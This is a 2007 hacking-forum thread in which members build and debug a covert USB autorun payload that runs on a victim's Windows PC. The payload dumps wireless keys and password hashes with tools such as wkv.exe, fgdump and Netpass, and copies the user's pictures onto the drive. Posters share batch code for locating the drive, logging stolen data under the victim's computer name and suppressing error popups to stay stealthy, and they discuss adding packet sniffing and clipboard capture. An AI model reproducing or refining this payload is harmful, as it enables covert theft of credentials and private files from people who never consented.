GonZor Posted July 9, 2007 Share Posted July 9, 2007 Thanks Gonzor. Could be interesting for next versions add some features like try to catch domain passords, (I don't know if this could be possible) or install any kind of sniffer for to get "on the fly" passwords. another idea its to add a Keylogger... what do you think about? The "sniffer" is possible, I made something similar a while back and then just used sniffpass to filter the raw packets. The problem is the need to silently install WinPcap. I don't like the idea of key loggers and I don't think I will be adding one to my payload. Quote Link to comment Share on other sites More sharing options...
marc Posted July 9, 2007 Share Posted July 9, 2007 darkjoker, I received that error a few times, but mainly in a media centre PC. What OS gives you that? A google search seems to show results for all kinds of USB devices, and therefore I do not think its the payload that gives that problem. Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table? Quote Link to comment Share on other sites More sharing options...
darkjoker Posted July 10, 2007 Share Posted July 10, 2007 The OS i have is windows XP pro Quote Link to comment Share on other sites More sharing options...
herman Posted July 10, 2007 Share Posted July 10, 2007 I also get the "Windows - No disk Exception Processing Message c00000013 Parameters 75b4bf7c 75b4bf7c" -error, and it dosn't disappear until ive clicked any alternatiev like 10 times. The log is written, but it isn't very stealth when you get that error... Win XP, sp2 Cruzer Titanium 2 GB (u3) Quote Link to comment Share on other sites More sharing options...
marc Posted July 10, 2007 Share Posted July 10, 2007 Some websites regarding this error: http://wook.wordpress.com/2007/06/25/excep...6bf9c-75b6bf9c/ http://forums.techguy.org/business-applica...ocessing-3.html http://my.opera.com/opera-usb/forums/topic.dml?id=187458 Seems something to do with Norton and/or quicktime. Can everyone who is getting this error please tell me what AV they have (if any), and their status with quicktime being installed? Quote Link to comment Share on other sites More sharing options...
darkjoker Posted July 10, 2007 Share Posted July 10, 2007 i have AVG and i do have quicktime installed P.S how do i make it stealth? cause it pops up cmd Quote Link to comment Share on other sites More sharing options...
Erdnase Posted July 11, 2007 Share Posted July 11, 2007 Erdnase, can I guess where you got your nickname from? Anything to do with S.W.Erdnase's expert at the card table? Rigth Marc... one of my favorite books and other of my passions Quote Link to comment Share on other sites More sharing options...
marc Posted July 12, 2007 Share Posted July 12, 2007 Same here Erdnase. I've been a semi-professional working magician from a 14 year interest in magic :). Quote Link to comment Share on other sites More sharing options...
herman Posted July 12, 2007 Share Posted July 12, 2007 Hehe, funny is the fact that I also have been into magic. Seems like magicians have a strong attraction to hak5 OnT: I do not have Norton or any other Symantech software but I do have quicktime installed. I'm so sad that I get this error message, otherwise this would be the perfect payload for me. Really hope Gonzor finds out what's going on and upload a stable and non-bugging version soon. Keep up the good work! Quote Link to comment Share on other sites More sharing options...
marc Posted July 14, 2007 Share Posted July 14, 2007 Whoa. All magicians in the house, give me your MSN Messenger (preferably, or iChat/AIM) addresses ! Sorry, for this offtopic stuff. Me and Gonzor are working on a new part of the payload. I wont give much away, I'll let Gonzor do that, but it seems to be quite useful, and I'm sure more will be told as we develop it. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 17, 2007 Share Posted July 17, 2007 @ GonZor Was wondering if you or anyone could help me with something. I'm looking at your go.bat file and it is coded very nicely. A bit more complex then the original switchblade. Say I want to have my usb stick (memorex mini 256 travel drive) just have one job to do, to dump wireless keys. I flash the drive with the universal customizer with a file to autorun wifi.bat and including in that file: Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1 echo **********[Dump Wireless Key]******* >> ....Documentslogfiles%computername%.log 2>&1 Echo ************************************ >> ....Documentslogfiles%computername%.log 2>&1  .wkv.exe /stext "....Documentslogfiles%computername%_wk.log" >> ....Documentslogfiles%computername%.log 2>&1  copy ....Documentslogfiles%computername%.log+....Documentslogfiles%computername%_wk.log* ....Documentslogfiles%computername%.log >> nul  del /f /q "....Documentslogfiles%computername%_wk.log" >nul The U3 Partition is setup as follows: autorun.ini [tell's to run autoexec.bat] autoexec.bat [tells to run FilesAutoRun.bat] Files Dir. Contents: FilesAutoRun.bat [call's wifi.bat] Fileswifi.bat Fileswkv.exe My problem is it will not write to the removable part of the drive for nothing in the world. I'm I'm sure it is something with the path part of the code. I've tried changing it to: .. .... .. Still no luck. Any suggestions? Anybody? Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 17, 2007 Share Posted July 17, 2007 You need to detect where the flash partition is mapped. Looking at my go.bat you will notice that I have done this by searching for a dat file which is on the flash partition. Normally you will need to create the file manually but SBConfig.exe does this for you when you use my payload. :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (     IF EXIST %%i:NUL.EXT (         :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC         IF EXIST %%i:SystemSRCdrv.dat (         SET fd=%%i:System             )     ) ) :: CREATE LOG DIRECTORY     IF NOT EXIST %fd%Logs%computername% (         MD %fd%Logs%computername%         ) :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG     DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"     SET /p count=<"%fd%SRC###" :: SET LOG PATH     SET log="%fd%Logs%computername%%computername%-[%count%].log" Create a file on your flash partition SystemSRCdrv.dat. Place that at the top of your go.bat, now when you refer to your log file use %log%, this will expand to X:SystemLogs%computername%%computername%-[%count%].log where X is the flash drive letter and count is the amount of logs for that computer in the folder. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 17, 2007 Share Posted July 17, 2007 Nice... guess that makes sense, still a bit complex for me to fully understand it just by looking at it, but i'm gonna hopefully get to mess around with it tonight:) Quote Link to comment Share on other sites More sharing options...
beakmyn Posted July 18, 2007 Share Posted July 18, 2007 Nice job! I'm doing some tweaks to it now and compiling the batch files to executables, etc. But one thing struck me as odd and most likely it's my relatively vacant use of batch files. You seem to use the " mark singularly. such as: SET U3="%%i:SRC or IF EXIST %include%1. dat" ( What is the reason for this? typically I've seen the use of the as an escape character and I'm used to seeing the " being used in pairs to enclose items with spaces or use literal meaning. Just curious. Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 19, 2007 Share Posted July 19, 2007 In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep) SET include="G:SRCInclude IF EXIST %include%0.dat" When the second line is expanded it will look like this "G:SRCInclude0.dat" Note the " on either end, If I were to enclose each in " like so SET include="G:SRCInclude" IF EXIST "%include%0.dat" When the second line is expanded it will look like this, and fail ""G:SRCInclude"0.dat" To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up. Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep. I'm doing some tweaks to it now and compiling the batch files to executables, etc. Id love to take a look at the tweaks you've made, as well as the executable. What language? Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 19, 2007 Share Posted July 19, 2007 Ok GonZor, I'm really trying to understand this part of your code and I think I got it. :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( Searches every drive letter for possible removable flash drive        IF EXIST %%i:NUL.EXT ( Searches for the drive letter defined as %%i with a null value extension         :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC         IF EXIST %%i:SystemSRCdrv.dat (         SET fd=%%i:System             ) Looks for a specific file in order to identify the drive in a directory SystemSRCdrv.dat If that's the case what exactly is fd in "SET fd=%%iSystem" Quote Link to comment Share on other sites More sharing options...
beakmyn Posted July 19, 2007 Share Posted July 19, 2007 In certain situations you'll notice I do use " in pairs, and ultimately they end up being used in pairs anyway. Generally If I am setting a folder path I will use a single " at the beginning but if I am setting a path to a file I will enclose it in " marks (I know that makes no sense but you will have to forgive me I have had no sleep) SET include="G:SRCInclude IF EXIST %include%0.dat" When the second line is expanded it will look like this "G:SRCInclude0.dat" Note the " on either end, If I were to enclose each in " like so SET include="G:SRCInclude" IF EXIST "%include%0.dat" When the second line is expanded it will look like this, and fail ""G:SRCInclude"0.dat" To simplify my code I could get away without using any " for this situation but it is just a habit I have picked up. Sorry about the rough quick explanation, If it doesn't make sense I can attempt another explanation after I've had some sleep. I'm doing some tweaks to it now and compiling the batch files to executables, etc. Id love to take a look at the tweaks you've made, as well as the executable. What language? It makes perfect sense. I just didn't realize that you could do that. I'm used to " denoting a string data type and that it has to have a closing ". Or in some case 3 " which what I expected to see in your code. But that tends to muck things up so instead I'll use chr(34) or equivalent and concatenation. I guess the batch file environment is more forgiving being an interpretated language but it makes the syntax highlighting in ExeScript goofing. That's what I'm using to compile the batches (ExeScript). Albeit it's still just a batch file with a exe wrapper. Not a real executable, yet. One thing I've done is changed the layout for the log file: ECHO +-----------------------------------+ >> %log% 2>&1 ECHO |     [System info]      | >> %log% 2>&1 ECHO +-----------------------------------+ >> %log% 2>&1 I find the above easier on the eyes then the old ***** method I'm also going to add in a safety file, time-date stamp, grab clipboard contents and other minor tweaks. I'll post when its done. The one thing I do like is that you still have launchpad functionality and the tools are on the CDROM partition rather then flash. I'm also going to verify fgdump as I've never gotten that to work and used an older pwdump instead. Quote Link to comment Share on other sites More sharing options...
beakmyn Posted July 21, 2007 Share Posted July 21, 2007 Found the following issues | was being used as a piped command where I think your intention was for it to be a pipe character. If you have a multi-card usb hub or other usb holder with no disk, the for loop will cause errors to be displayed to the user about "no disk present" abort,retry,fail Count script sometimes returns "volume in drive d is removable" (where d is variable) this screws up the file name and you get computername - [volume in drive d is removable].log I'm investigating root cause. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 26, 2007 Share Posted July 26, 2007 @ GonZor, Using your script with file.exe and it isn't working am I doing something wrong? @echo off :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO (     :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC     IF EXIST %%i:SystemSRCdrv.dat (     SET fd=%%i:SystemSRC             )     ) :: CREATE LOG DIRECTORY     IF NOT EXIST %fd%Logs%computername% (         MD %fd%Logs%computername%         ) :: COUNT NUMBER OF PREVIOUS LOGS FROM THIS COMPUTER SO THAT WE DO NOT OVERWRITE A LOG     DIR /a-d /s "%fd%Logs%computername%" | FIND /c ".log" > "%fd%SRC###"     SET /p count=<"%fd%SRC###" :: SET LOG PATH     SET log="%fd%Logs%computername%%computername%-[%count%].log" :: CREATE PIC DIRECTORY     IF NOT EXIST %fd%Documents%computername%Pictures (         MD %fd%Documents%computername%Pictures         ) file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "Documents%computername%Pictures" /I /P Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 26, 2007 Share Posted July 26, 2007 @ GonZor, Using your script with file.exe and it isn't working am I doing something wrong? To be honest I have never used file.exe so I am unfamiliar with how its used but looking at your code, I am going to assume the last three lines should look like this: file.exe /A:C "%Documents and Settings%%username%My Documents*.jpg" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.bmp" "%fd%Documents%computername%Pictures" /I /P file.exe /A:C "%Documents and Settings%%username%My Documents*.gif" "%fd%Documents%computername%Pictures" /I /P assuming the syntax is file.exe /A:C <source> <destination> /I /P, this should work fine now. the problem was you were saying the destination was on the CD partition (which you obviously cant write to a CDFS partition). Quote Link to comment Share on other sites More sharing options...
LBlinkinbiz Posted July 26, 2007 Share Posted July 26, 2007 Hey Gonzor,   Just wanna report in some personal bug feedback. I am getting this message: ====================== Windows - No Disk             X ====================== X  There is no disk in the drive.    Please insert a disk into drive. |Cancel| |Try Again| |Continue| And it is the cmd. exe process that is running during this error. This also occurs when Netpass runs (even when netpass is disabled [WTF?]) Otherwise, the rest of the payload works like a charm. Hacksaw works perfectly - just as long as I log in and stuff like you said. Keep up the good work! Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 26, 2007 Share Posted July 26, 2007 @ GonZor, Ahhh, makes total sense. Thanks man really appreciate it. I'm gonna definitely try that out tonight:) Oh yea I forgot, the logs, it does create log folder's, but doesn't actually create any logs. It creats the folders in the SRC directory, but I'll mess around with that tonight also. Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 27, 2007 Share Posted July 27, 2007 Just one ? a little confused. Still not working, but it could just be file.exe issue, but according to the following code: @echo off :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( Â Â Â Â :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC Â Â Â Â IF EXIST %%i:SystemSRCdrv.dat ( Â Â Â Â SET fd=%%i:SystemSRC Â Â Â Â Â Â Â Â Â Â Â Â ) Â Â Â Â ) It looks to me like your defining the flash partition as drive i: I don't see how it gets defined as %fd% Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 27, 2007 Share Posted July 27, 2007 It looks to me like your defining the flash partition as drive i: I don't see how it gets defined as %fd% Sorry if this makes no sense at all, just got home from a party. I'll try to explain each line individually. :: DETERMINE WHICH WHERE THE DRIVES ARE MAPPED FOR %%i IN ( B C D E F G H I J K L M N O P Q R S T U V W X Y Z ) DO ( FOR %variable IN (set) DO <command> %variable specifies a single letter variable (my chosen variable %%i) (set) specifies what the variable will be each time (in this case the alphabet) <command> specifies the command to do with each variable in the set (in this case I used an open bracket just for readability)     :: SEARCH FOR A FILE CALLED drv.dat IN THE DIRECTORY SystemSRC     IF EXIST %%i:SystemSRCdrv.dat ( The first command for each variable, IF EXIST <file> <command> <file> specifies the file to search for (in this case we are searching for the file SystemSRCdrv.dat but this can be changed to any file) <command> specifies the command to do if the file exists (once again I used an open bracket for readability, I find it easier)         SET fd=%%i:SystemSRC This is the command to be completed once the file is found to exist, SET <variable>=<string> <variable> specifies the variable that we will later call on to expand into the string (in this case the variable is fd and is later called as %fd%) <string> specifies what we want the variable to expand to when it is called (in this case we want it to expand to the drive letter & the folder path SystemSRC)         )     ) These are just the closing brackets to both statements, first closing the IF EXIST command and second closing the FOR command. This could be written as one line but for readability I use the brackets. I hope that made sense but time now for some sleep :shock: Quote Link to comment Share on other sites More sharing options...
G-Stress Posted July 30, 2007 Share Posted July 30, 2007 Thanks alot GonZor, makes much more sense now. Appreciate you takin the time to explain each step individually Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.